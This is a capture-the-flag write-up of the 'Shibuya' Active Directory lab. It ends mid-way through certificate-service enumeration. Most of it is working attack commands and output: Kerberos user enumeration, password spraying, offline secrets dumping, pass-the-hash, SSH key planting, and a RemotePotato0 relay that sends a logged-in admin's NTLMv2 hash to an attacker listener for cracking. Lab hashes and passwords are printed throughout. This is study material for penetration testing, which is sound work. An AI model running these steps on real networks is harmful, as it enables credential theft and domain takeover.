ActiveDirectoryHackTheBoxWindowsVulnLabs

Shibuya

User enum→weak creds→plaintext service account password→WIM registry dump→offline hash crack→SSH key upload→PTH as domain user→NTLM coerce active RDP session→crack hash→ESC1 cert as Administrator→PWN

Target: 10.129.234.42 Domain: shibuya.vl Domain Controller: AWSJPDC0522.shibuya.vl Difficulty: Medium Tags: Active Directory, Kerberos, WIM Forensics, DPAPI, NTLMv2 Relay, ADCS / ESC1/ESC2/ESC3

1. Reconnaissance

A full nmap service scan against the target revealed a classic Windows Server 2022 Active Directory domain controller

┌──(kali㉿kali)-[~]
└─$ nmap 10.129.234.42 -sCV
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-16 00:45 -0400
Nmap scan report for 10.129.234.42
Host is up (0.20s latency).
Not shown: 989 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
22/tcp   open  ssh           OpenSSH for_Windows_9.5 (protocol 2.0)
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2026-03-16 04:46:14Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: shibuya.vl, Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=AWSJPDC0522.shibuya.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:AWSJPDC0522.shibuya.vl
| Not valid before: 2026-03-16T04:29:09
|_Not valid after:  2027-03-16T04:29:09
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: shibuya.vl, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=AWSJPDC0522.shibuya.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:AWSJPDC0522.shibuya.vl
| Not valid before: 2026-03-16T04:29:09
|_Not valid after:  2027-03-16T04:29:09
|_ssl-date: TLS randomness does not represent time
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info: 
|   Target_Name: SHIBUYA
|   NetBIOS_Domain_Name: SHIBUYA
|   NetBIOS_Computer_Name: AWSJPDC0522
|   DNS_Domain_Name: shibuya.vl
|   DNS_Computer_Name: AWSJPDC0522.shibuya.vl
|   DNS_Tree_Name: shibuya.vl
|   Product_Version: 10.0.20348
|_  System_Time: 2026-03-16T04:47:00+00:00
|_ssl-date: 2026-03-16T04:47:39+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=AWSJPDC0522.shibuya.vl
| Not valid before: 2026-03-15T04:38:17
|_Not valid after:  2026-09-14T04:38:17
Service Info: Host: AWSJPDC0522; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2026-03-16T04:47:02
|_  start_date: N/A

┌──(kali㉿kali)-[~]
└─$ nmap 10.129.234.42 -sU
Not shown: 996 open|filtered udp ports (no-response)
PORT    STATE SERVICE
53/udp  open  domain
88/udp  open  kerberos-sec
123/udp open  ntp
389/udp open  ldap

A follow-up UDP scan (nmap -sU) confirmed standard AD UDP services: DNS (53), Kerberos (88), NTP (123), and LDAP (389).

┌──(kali㉿kali)-[~/Documents/shibuya]
└─$ nxc smb 10.129.234.42 -u '' -p '' --shares
SMB         10.129.234.42   445    AWSJPDC0522      [*] Windows Server 2022 Build 20348 x64 (name:AWSJPDC0522) (domain:shibuya.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         10.129.234.42   445    AWSJPDC0522      [+] shibuya.vl\: 
SMB         10.129.234.42   445    AWSJPDC0522      [-] Error enumerating shares: STATUS_ACCESS_DENIED


┌──(kali㉿kali)-[~/Documents/shibuya]
└─$ nxc smb 10.129.234.42 -u 'guest' -p '' --shares
SMB         10.129.234.42   445    AWSJPDC0522      [*] Windows Server 2022 Build 20348 x64 (name:AWSJPDC0522) (domain:shibuya.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         10.129.234.42   445    AWSJPDC0522      [-] shibuya.vl\guest: STATUS_ACCOUNT_DISABLED 


┌──(kali㉿kali)-[~/Documents/shibuya]
└─$ ldapsearch -x -H ldap://10.129.234.42 -b "DC=shibuya,DC=vl" "(objectClass=user)"
ldap_sasl_bind(SIMPLE): Cant contact LDAP server (-1)

┌──(kali㉿kali)-[~/Documents/shibuya]
└─$ ldapsearch -x -H ldap://10.129.234.42:3268 -b "DC=shibuya,DC=vl" "(objectClass=user)"
# extended LDIF
#
# LDAPv3
# base <DC=shibuya,DC=vl> with scope subtree
# filter: (objectClass=user)
# requesting: ALL
#

# search result
search: 2
result: 1 Operations error
text: 000004DC: LdapErr: DSID-0C090DA9, comment: In order to perform this opera
 tion a successful bind must be completed on the connection., data 0, v4f7c

# numResponses: 1

Anonymous LDAP queries were blocked — the server required an authenticated bind before returning any directory data.

2. Initial Access — Credential Discovery via Kerbrute

With no valid credentials yet, Kerbrute was used against the xato-net-10-million-usernames wordlist to enumerate valid domain accounts via Kerberos pre-authentication responses:

┌──(kali㉿kali)-[~/Documents/shibuya]
└─$ ../../Downloads/kerbrute_linux_amd64 userenum -d shibuya.vl ../../SecLists/Usernames/xato-net-10-million-usernames.txt --dc 10.129.234.42

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 03/16/26 - Ronnie Flathers @ropnop

2026/03/16 01:34:04 >  Using KDC(s):
2026/03/16 01:34:04 >   10.129.234.42:88

2026/03/16 01:34:09 >  [+] VALID USERNAME:       [email protected]
2026/03/16 01:34:16 >  [+] VALID USERNAME:       [email protected]
2026/03/16 01:38:18 >  [+] VALID USERNAME:       [email protected]
2026/03/16 01:41:58 >  [+] VALID USERNAME:       [email protected]
2026/03/16 01:46:25 >  [+] VALID USERNAME:       [email protected]
2026/03/16 01:46:26 >  [+] VALID USERNAME:       [email protected]

Valid usernames discovered:

Password spraying these accounts with their usernames as passwords succeeded — both accounts used trivially weak credentials (purple:purple, red:red). This is a common pattern on lab environments but also seen in real-world environments for service or test accounts.


┌──(kali㉿kali)-[~/Documents/shibuya]
└─$ nxc smb 10.129.234.42 -u 'purple' -p 'purple' --shares -k                                                                           
SMB         10.129.234.42   445    AWSJPDC0522      [*] Windows Server 2022 Build 20348 x64 (name:AWSJPDC0522) (domain:shibuya.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         10.129.234.42   445    AWSJPDC0522      [+] shibuya.vl\purple:purple 
SMB         10.129.234.42   445    AWSJPDC0522      [*] Enumerated shares
SMB         10.129.234.42   445    AWSJPDC0522      Share           Permissions     Remark
SMB         10.129.234.42   445    AWSJPDC0522      -----           -----------     ------
SMB         10.129.234.42   445    AWSJPDC0522      ADMIN$                          Remote Admin
SMB         10.129.234.42   445    AWSJPDC0522      C$                              Default share
SMB         10.129.234.42   445    AWSJPDC0522      images$                         
SMB         10.129.234.42   445    AWSJPDC0522      IPC$            READ            Remote IPC
SMB         10.129.234.42   445    AWSJPDC0522      NETLOGON        READ            Logon server share 
SMB         10.129.234.42   445    AWSJPDC0522      SYSVOL          READ            Logon server share 
SMB         10.129.234.42   445    AWSJPDC0522      users           READ           


┌──(kali㉿kali)-[~/Documents/shibuya]
└─$ nxc smb 10.129.234.42 -u 'red' -p 'red' --shares -k
SMB         10.129.234.42   445    AWSJPDC0522      [*] Windows Server 2022 Build 20348 x64 (name:AWSJPDC0522) (domain:shibuya.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         10.129.234.42   445    AWSJPDC0522      [+] shibuya.vl\red:red 
SMB         10.129.234.42   445    AWSJPDC0522      [*] Enumerated shares
SMB         10.129.234.42   445    AWSJPDC0522      Share           Permissions     Remark
SMB         10.129.234.42   445    AWSJPDC0522      -----           -----------     ------
SMB         10.129.234.42   445    AWSJPDC0522      ADMIN$                          Remote Admin
SMB         10.129.234.42   445    AWSJPDC0522      C$                              Default share
SMB         10.129.234.42   445    AWSJPDC0522      images$                         
SMB         10.129.234.42   445    AWSJPDC0522      IPC$            READ            Remote IPC
SMB         10.129.234.42   445    AWSJPDC0522      NETLOGON        READ            Logon server share 
SMB         10.129.234.42   445    AWSJPDC0522      SYSVOL          READ            Logon server share 
SMB         10.129.234.42   445    AWSJPDC0522      users           READ

Both accounts authenticated successfully but had only standard read access to IPC$, NETLOGON, SYSVOL, and users.

3. SMB Enumeration & Credential Leak in User Description

Using the red account to enumerate all domain users via SMB:

┌──(kali㉿kali)-[~]
└─$ nxc smb shibuya.vl -u red -p red -k --users
SMB         shibuya.vl      445    AWSJPDC0522      [*] Windows Server 2022 Build 20348 x64 (name:AWSJPDC0522) (domain:shibuya.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         shibuya.vl      445    AWSJPDC0522      [+] shibuya.vl\red:red 
SMB         shibuya.vl      445    AWSJPDC0522      -Username-                    -Last PW Set-       -BadPW- -Description-                                               
SMB         shibuya.vl      445    AWSJPDC0522      _admin                        2025-02-15 07:55:29 0       Built-in account for administering the computer/domain 
SMB         shibuya.vl      445    AWSJPDC0522      Guest                         <never>             0       Built-in account for guest access to the computer/domain 
SMB         shibuya.vl      445    AWSJPDC0522      krbtgt                        2025-02-15 07:24:57 0       Key Distribution Center Service Account 
SMB         shibuya.vl      445    AWSJPDC0522      svc_autojoin                  2025-02-15 07:51:49 0       K5&A6Dw9d8jrKWhV 
SMB         shibuya.vl      445    AWSJPDC0522      Leon.Warren                   2025-02-16 10:23:34 0        
SMB         shibuya.vl      445    AWSJPDC0522      Graeme.Kerr                   2025-02-16 10:23:34 0        
SMB         shibuya.vl      445    AWSJPDC0522      Joshua.North                  2025-02-16 10:23:34 0        
SMB         shibuya.vl      445    AWSJPDC0522      Shaun.Burton                  2025-02-16 10:23:34 0        
SMB         shibuya.vl      445    AWSJPDC0522      Gillian.Douglas               2025-02-16 10:23:34 0        
SMB         shibuya.vl      445    AWSJPDC0522      Kelly.Davies                  2025-02-16 10:23:34 0        
SMB         shibuya.vl      445    AWSJPDC0522      Conor.Fletcher                2025-02-16 10:23:34 0        
SMB         shibuya.vl      445    AWSJPDC0522      Karl.Brown                    2025-02-16 10:23:34 0        
SMB         shibuya.vl      445    AWSJPDC0522      Tracey.Wood                   2025-02-16 10:23:34 0        
SMB         shibuya.vl      445    AWSJPDC0522      Mohamed.Brooks                2025-02-16 10:23:34 0        
SMB         shibuya.vl      445    AWSJPDC0522      Wendy.Stevenson               2025-02-16 10:23:34 0        
SMB         shibuya.vl      445    AWSJPDC0522      Gerald.Allen                  2025-02-16 10:23:34 0        

...SNIP...

The output revealed something immediately valuable — the svc_autojoin service account had its password stored in plaintext in the description field: This is a well-known misconfiguration where administrators set a description on service accounts during provisioning and forget to remove it. The --users flag in NetExec queries the description attribute for every account, making this a trivial find.

Credential validation confirmed svc_autojoin:K5&A6Dw9d8jrKWhV and revealed it had READ access to the images$ share — which purple and red did not.

┌──(kali㉿kali)-[~]
└─$ nxc smb shibuya.vl -u svc_autojoin -p 'K5&A6Dw9d8jrKWhV' -k --shares
SMB         shibuya.vl      445    AWSJPDC0522      [*] Windows Server 2022 Build 20348 x64 (name:AWSJPDC0522) (domain:shibuya.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         shibuya.vl      445    AWSJPDC0522      [+] shibuya.vl\svc_autojoin:K5&A6Dw9d8jrKWhV 
SMB         shibuya.vl      445    AWSJPDC0522      [*] Enumerated shares
SMB         shibuya.vl      445    AWSJPDC0522      Share           Permissions     Remark
SMB         shibuya.vl      445    AWSJPDC0522      -----           -----------     ------
SMB         shibuya.vl      445    AWSJPDC0522      ADMIN$                          Remote Admin
SMB         shibuya.vl      445    AWSJPDC0522      C$                              Default share
SMB         shibuya.vl      445    AWSJPDC0522      images$         READ            
SMB         shibuya.vl      445    AWSJPDC0522      IPC$            READ            Remote IPC
SMB         shibuya.vl      445    AWSJPDC0522      NETLOGON        READ            Logon server share 
SMB         shibuya.vl      445    AWSJPDC0522      SYSVOL          READ            Logon server share 
SMB         shibuya.vl      445    AWSJPDC0522      users           READ

Authenticating as svc_autojoin using Kerberos and browsing the images$ share via impacket-smbclient:

┌──(kali㉿kali)-[~]
└─$ kinit [email protected]
Password for [email protected]: 

┌──(kali㉿kali)-[~/Documents/shibuya]
└─$ export KRB5CCNAME=/tmp/krb5cc_1000

The naming convention AWSJPWK0222 maps to the workstation found later in AD (AWSJPWK0222). These .wim files are Windows Imaging Format disk images, almost certainly Volume Shadow Copy (VSS) snapshots of the workstation, confirmed by the vss-meta.cab metadata archive.

┌──(kali㉿kali)-[~/Documents/shibuya]
└─$ impacket-smbclient -k shibuya.vl/[email protected] -no-pass
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies 

# use images$
# ls
drw-rw-rw-          0  Wed Feb 19 12:35:20 2025 .
drw-rw-rw-          0  Tue Apr  8 20:09:45 2025 ..
-rw-rw-rw-    8264070  Wed Feb 19 12:35:20 2025 AWSJPWK0222-01.wim
-rw-rw-rw-   50660968  Wed Feb 19 12:35:20 2025 AWSJPWK0222-02.wim
-rw-rw-rw-   32065850  Wed Feb 19 12:35:20 2025 AWSJPWK0222-03.wim
-rw-rw-rw-     365686  Wed Feb 19 12:35:20 2025 vss-meta.cab
# get AWSJPWK0222-01.wim
# get AWSJPWK0222-02.wim
# get AWSJPWK0222-03.wim
# get vss-meta.cab

All four files were retrieved and extracted with 7-Zip:

┌──(kali㉿kali)-[~/Documents/shibuya]
└─$ 7z x AWSJPWK0222-01.wim -owim_loot


┌──(kali㉿kali)-[~/Documents/shibuya]
└─$ 7z x AWSJPWK0222-02.wim -owim_loot2


┌──(kali㉿kali)-[~/Documents/shibuya]
└─$ 7z x AWSJPWK0222-03.wim -owim_loot3

Contents of each WIM:

5. Offline Secrets Dump from WIM Registry Hives

With the SAM, SECURITY, and SYSTEM hives extracted locally, impacket-secretsdump was used to perform an offline registry secrets dump — no network connection to the DC required:

┌──(kali㉿kali)-[~/…/Roaming/Microsoft/Protect/S-1-5-21-1498285545-150618015-1395900109-500]
└─$ impacket-secretsdump -sam ~/Documents/shibuya/wim_loot2/SAM -security ~/Documents/shibuya/wim_loot2/SECURITY -system ~/Documents/shibuya/wim_loot2/SYSTEM LOCAL
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Target system bootKey: 0x2e971736685fc53bfd5106d471e2f00f
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8dcb5ed323d1d09b9653452027e8c013:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:9dc1b36c1e31da7926d77ba67c654ae6:::
operator:1000:aad3b435b51404eeaad3b435b51404ee:5d8c3d1a20bd63f60f469f6763ca0d50:::
[*] Dumping cached domain logon information (domain/username:hash)
SHIBUYA.VL/Simon.Watson:$DCC2$10240#Simon.Watson#04b20c71b23baf7a3025f40b3409e325: (2025-02-16 11:17:56+00:00)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
$MACHINE.ACC:plain_password_hex:2f006b004e0045004c0045003f0051005800290040004400580060005300520079002600610027002f005c002e002e0053006d0037002200540079005e0044003e004e0056005f00610063003d00270051002e00780075005b0075005c00410056006e004200230066004a0029006f007a002a005700260031005900450064003400240035004b0079004d006f004f002100750035005e0043004e002500430050006e003a00570068005e004e002a0076002a0043005a006c003d00640049002e006d005a002d002d006e0056002000270065007100330062002f00520026006b00690078005b003600670074003900
$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:1fe837c138d1089c9a0763239cd3cb42
[*] DPAPI_SYSTEM 
dpapi_machinekey:0xb31a4d81f2df440f806871a8b5f53a15de12acc1
dpapi_userkey:0xe14c10978f8ee226cbdbcbee9eac18a28b006d06
[*] NL$KM 
 0000   92 B9 89 EF 84 2F D6 55  73 67 31 8F E0 02 02 66   ...../.Usg1....f
 0010   F9 81 42 68 8C 3B DF 5D  0A E5 BA F2 4A 2C 43 0E   ..Bh.;.]....J,C.
 0020   1C C5 4F 40 1E F5 98 38  2F A4 17 F3 E9 D9 23 E3   [email protected]/.....#.
 0030   D1 49 FE 06 B3 2C A1 1A  CB 88 E4 1D 79 9D AE 97   .I...,......y...
NL$KM:92b989ef842fd6557367318fe0020266f98142688c3bdf5d0ae5baf24a2c430e1cc54f401ef598382fa417f3e9d923e3d149fe06b32ca11acb88e41d799dae97
[*] Cleaning up... 




┌──(kali㉿kali)-[~/Documents/shibuya/wim_loot]
└─$ cd /home/kali/Documents/shibuya/wim_loot/Administrator/AppData/Roaming/Microsoft/Protect/


┌──(kali㉿kali)-[~/…/AppData/Roaming/Microsoft/Protect]
└─$ ls    
CREDHIST  S-1-5-21-1498285545-150618015-1395900109-500


┌──(kali㉿kali)-[~/…/AppData/Roaming/Microsoft/Protect]
└─$ cd S-1-5-21-1498285545-150618015-1395900109-500                                

┌──(kali㉿kali)-[~/…/Roaming/Microsoft/Protect/S-1-5-21-1498285545-150618015-1395900109-500]
└─$ ls
7db75135-c076-465e-a4cc-3d5243f57db7  Preferred

Key findings:

Local operator account NT hash: 5d8c3d1a20bd63f60f469f6763ca0d50
Cached domain credential (DCC2) for Simon.Watson — this hash format is not directly usable for PTH, but the local NT hash for operator matched simon.watson's hash when tested against the DC (the workstation was presumably provisioned with the same local admin hash, or simon.watson is the local operator equivalent)
DPAPI machine and user keys extracted for potential future DPAPI decryption

6. Lateral Movement to simon.watson (PTH + SSH)

The operator local NT hash (5d8c3d1a20bd63f60f469f6763ca0d50) was tested against the domain controller as simon.watson using Pass-the-Hash:

┌──(kali㉿kali)-[~]
└─$ nxc smb 10.129.234.42 -u 'simon.watson' -H '5d8c3d1a20bd63f60f469f6763ca0d50'
SMB         10.129.234.42   445    AWSJPDC0522      [*] Windows Server 2022 Build 20348 x64 (name:AWSJPDC0522) (domain:shibuya.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         10.129.234.42   445    AWSJPDC0522      [+] shibuya.vl\simon.watson:5d8c3d1a20bd63f60f469f6763ca0d50

Authentication succeeded, confirming password reuse between the local workstation account and the domain account.

User flag retrieved via SMB:

┌──(kali㉿kali)-[~/Documents/shibuya]
└─$ impacket-smbclient shibuya.vl/[email protected] -hashes aad3b435b51404eeaad3b435b51404ee:5d8c3d1a20bd63f60f469f6763ca0d50
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies 

Type help for list of commands
# use users
# cd simon.watson
# cd Desktop
# cat user.txt
7353xxxxxxxxxxxxxxxxxxxxxxc261

Persistent SSH access was then established by uploading an SSH public key to simon.watson's profile via SMB:

┌──(kali㉿kali)-[~/Documents/shibuya]
└─$ ssh-keygen -t ed25519 -f simon_key
Generating public/private ed25519 key pair.
Enter passphrase for "simon_key" (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in simon_key
Your public key has been saved in simon_key.pub
The key fingerprint is:
SHA256:8YV+GWorjxzPJm43auho5Iw1X8u5r2Stc5xYpBTIrwA kali@kali
The key\'s randomart image is:
+--[ED25519 256]--+
|     . .         |
|  E   o .  .     |
|   .   .... o    |
|    .   o+.o o   |
|     . oSo= o    |
|    + . oo.o     |
|   * o +=*o.     |
|  . +.o+XOB      |
|   ....+O@=.     |
+----[SHA256]-----+


┌──(kali㉿kali)-[~/Documents/shibuya]
└─$ cp simon_key.pub authorized_keys


┌──(kali㉿kali)-[~/Documents/shibuya]
└─$ impacket-smbclient shibuya.vl/[email protected] -hashes aad3b435b51404eeaad3b435b51404ee:5d8c3d1a20bd63f60f469f6763ca0d50
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies 
Type help for list of commands
# use users
# cd simon.watson
# mkdir .ssh
# cd .ssh
# put authorized_keys
# ls
drw-rw-rw-          0  Mon Mar 16 09:21:22 2026 .
drw-rw-rw-          0  Mon Mar 16 09:21:06 2026 ..
-rw-rw-rw-         91  Mon Mar 16 09:21:22 2026 authorized_keys


┌──(kali㉿kali)-[~/Documents/shibuya]
└─$ ssh -i simon_key [email protected]
** WARNING: connection is not using a post-quantum key exchange algorithm.
** This session may be vulnerable to "store now, decrypt later" attacks.
** The server may need to be upgraded. See https://openssh.com/pq.html
Microsoft Windows [Version 10.0.20348.3453]
(c) Microsoft Corporation. All rights reserved.

shibuya\simon.watson@AWSJPDC0522 C:\Users\simon.watson>

This gave a full interactive Windows command prompt on the DC.

7. Domain Enumeration as simon.watson

Checking simon.watson's group membership via whoami /all showed membership in:

SHIBUYA\shibuya
SHIBUYA\ssh
SHIBUYA\t2_admins

shibuya\simon.watson@AWSJPDC0522 C:\>whoami /all

USER INFORMATION
----------------

User Name            SID
==================== ===========================================
shibuya\simon.watson S-1-5-21-87560095-894484815-3652015022-1409

GROUP INFORMATION
-----------------

Group Name                                  Type             SID                                         Attributes
=========================================== ================ =========================================== ==================================================
Everyone                                    Well-known group S-1-1-0                                     Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                               Alias            S-1-5-32-545                                Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access  Alias            S-1-5-32-554                                Mandatory group, Enabled by default, Enabled group
BUILTIN\Certificate Service DCOM Access     Alias            S-1-5-32-574                                Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                        Well-known group S-1-5-2                                     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users            Well-known group S-1-5-11                                    Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization              Well-known group S-1-5-15                                    Mandatory group, Enabled by default, Enabled group
SHIBUYA\shibuya                             Group            S-1-5-21-87560095-894484815-3652015022-1108 Mandatory group, Enabled by default, Enabled group
SHIBUYA\ssh                                 Group            S-1-5-21-87560095-894484815-3652015022-3101 Mandatory group, Enabled by default, Enabled group
SHIBUYA\t2_admins                           Group            S-1-5-21-87560095-894484815-3652015022-1104 Mandatory group, Enabled by default, Enabled group
Service asserted identity                   Well-known group S-1-18-2                                    Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label            S-1-16-8448

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

USER CLAIMS INFORMATION
-----------------------

User claims unknown.
Kerberos support for Dynamic Access Control on this device has been disabled.

The t2_admins group membership is significant — it implies Tier 2 admin rights (workstation-level), but not Tier 1 (server/DC-level).

Enumerating t1_admins:

PS C:\> Get-ADGroup -Filter 'Name -like "*t1*"' | Get-ADGroupMember | Select-Object Name, SamAccountName
Name           SamAccountName
----           --------------
Norman Clayton Norman.Clayton
Nigel Mills    Nigel.Mills

PS C:\> cd Users

PS C:\Users> ls
    Directory: C:\Users
Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----          4/8/2025   4:36 PM                Administrator
d-----          4/8/2025   4:30 PM                nigel.mills                      
d-r---         2/14/2025  10:49 PM                Public
d-----         3/16/2026   6:21 AM                simon.watson

PS C:\Users\simon.watson> ps

Handles  NPM(K)    PM(K)      WS(K)     CPU(s)     Id  SI ProcessName                                                                                                                                                                     
-------  ------    -----      -----     ------     --  -- -----------
    177      12     1992       6388              2980   2 csrss
    372      15     3284      15492              4172   1 ctfmon
    420      35    17548      26368              1480   0 dfsrs
    156       9     1928       6396              3276   0 dfssvc
    280      15     3908      14744              3960   0 dllhost
  10395    7496   130112     128520              2628   0 dns
    722      31    14036      55600              1300   1 dwm
    631      26    18596      46032              6624   2 dwm
   1518      58    23684      87804              5496   1 explorer
     39       7     1308       3744              3752   2 fontdrvhost                                                                                                                                                                     
     39       7     1700       4796              4568   1 fontdrvhost
     39       7     1384       3720              4576   0 fontdrvhost
      0       0       60          8                 0   0 Idle
    154      13     1964       6432              2148   0 ismserv
    468      27    12660      48912              3872   2 LogonUI
   2361     247    79040      88000               732   0 lsass                                                                                                                                                                           
    770      37    47128      66596              2660   0 Microsoft.ActiveDirectory.WebServices
    215      14     1924       4580              3748   0 MicrosoftEdgeUpdate
    286      18     5364      19268              2268   0 MoUsoCoreWorker
    238      14     3012      11244              3940   0 msdtc
   1258      38   179004     196440              7016   1 mstsc
   1011      55   143152     173780       4.00   6108   0 powershell

explorer and mstsc tells someone is sitting on the RDP

Running qwinsta via RunasCs to check active RDP sessions:

PS C:\Users\simon.watson> .\RunasCs.exe -l 9 randomuser randompassword qwinsta

 SESSIONNAME       USERNAME                 ID  STATE   TYPE        DEVICE
>services                                    0  Disc
 rdp-tcp#0         nigel.mills               1  Active
 console                                     2  Conn                        
 rdp-tcp                                 65536  Listen

nigel.mills is actively logged into an RDP session on the DC (Session ID 1). This is the pivot point — nigel.mills is a t1_admin whose credentials can be targeted via NTLM relay from their active session.

8. NTLMv2 Hash Capture via RemotePotato0

Since nigel.mills had an active RDP session (Session 1), RemotePotato0 was used to coerce NTLM authentication from that session by spawning a COM object that triggers a cross-session authentication attempt back to our listener.

Attack setup: On the attacker machine, forward port 135 to the victim's RogueOxidResolver:

┌──(kali㉿kali)-[~/Documents/shibuya]
└─$ socat -v TCP-LISTEN:135,fork,reuseaddr TCP:10.129.234.42:8888

On the victim (as simon.watson):

PS C:\Users\simon.watson> .\RemotePotato0.exe -m 2 -r 10.10.16.5 -x 10.10.16.5 -p 8888 -s 1

-m 2 — mode 2 (cross-session NTLM relay)
-r — attacker IP for the RPC relay listener
-x — attacker IP for the RogueOxidResolver
-p 8888 — port for the RogueOxidResolver
-s 1 — target Session ID 1 (nigel.mills' RDP session)

RemotePotato0 spawns a COM object (CLSID: 5167B42F-C111-47A1-ACC4-8EABE61B0B54) in session 1, which authenticates back over DCOM/RPC, routing through our socat relay and captured as an NTLMv2 hash:

[*] Detected a Windows Server version not compatible with JuicyPotato. RogueOxidResolver must be run remotely. Remember to forward tcp port 135 on 10.10.16.5 to your victim machine on port 8888
[*] Example Network redirector:
        sudo socat -v TCP-LISTEN:135,fork,reuseaddr TCP:{{ThisMachineIp}}:8888
[*] Starting the RPC server to capture the credentials hash from the user authentication!!
[*] RPC relay server listening on port 9997 ...
[*] Spawning COM object in the session: 1
[*] Calling StandardGetInstanceFromIStorage with CLSID:{5167B42F-C111-47A1-ACC4-8EABE61B0B54}
[*] Starting RogueOxidResolver RPC Server listening on port 8888 ...
[*] IStoragetrigger written: 102 bytes
[*] ServerAlive2 RPC Call
[*] ResolveOxid2 RPC call
[+] Received the relayed authentication on the RPC relay server on port 9997
[*] Connected to RPC Server 127.0.0.1 on port 8888
[+] User hash stolen!

NTLMv2 Client   : AWSJPDC0522
NTLMv2 Username : SHIBUYA\Nigel.Mills
NTLMv2 Hash     : Nigel.Mills::SHIBUYA:7cb457a06add9ad8:9e24c1ee4aabcc372ddb534177e1a63d:010100000000000088434beb55b5dc0190e53ed67be75bfe0000000002000e005300480049004200550059004100010016004100570053004a0050004400430030003500320032000400140073006800690062007500790061002e0076006c0003002c004100570053004a0050004400430030003500320032002e0073006800690062007500790061002e0076006c000500140073006800690062007500790061002e0076006c000700080088434beb55b5dc01060004000600000008003000300000000000000001000000002000001a5158ee70c231a6454833d8ef122a35c2b094f0ad3fefcd1a7e7a526847b5460a00100000000000000000000000000000000000090000000000000000000000

Cracking with John the Ripper:

┌──(kali㉿kali)-[~/Documents/shibuya]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt nigelhash.txt 
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Sail2Boat3       (Nigel.Mills)     
1g 0:00:00:00 DONE (2026-03-16 11:04) 5.555g/s 1262Kp/s 1262Kc/s 1262KC/s astigg..920227
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed.

Credentials confirmed: nigel.mills:Sail2Boat3

9. ADCS Enumeration — ESC1/ESC2/ESC3 via Certipy

With nigel.mills (a t1_admin), an SSH SOCKS proxy was set up and Certipy was run through it to enumerate ADCS:

┌──(kali㉿kali)-[~/Documents/shibuya]
└─$ ssh -D 1080 [email protected]

┌──(kali㉿kali)-[~/Documents/shibuya]
└─$ proxychains certipy-ad find -u nigel.mills -p Sail2Boat3 -dc-ip 10.129.234.42 -target-ip 10.129.234.42 -vulnerable -enabled -stdout
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
Certipy v5.0.4 - by Oliver Lyak (ly4k)

[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.129.234.42:636  ...  OK
[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Finding issuance policies
[*] Found 15 issuance policies
[*] Found 0 OIDs linked to templates
[*] Retrieving CA configuration for 'shibuya-AWSJPDC0522-CA' via RRP
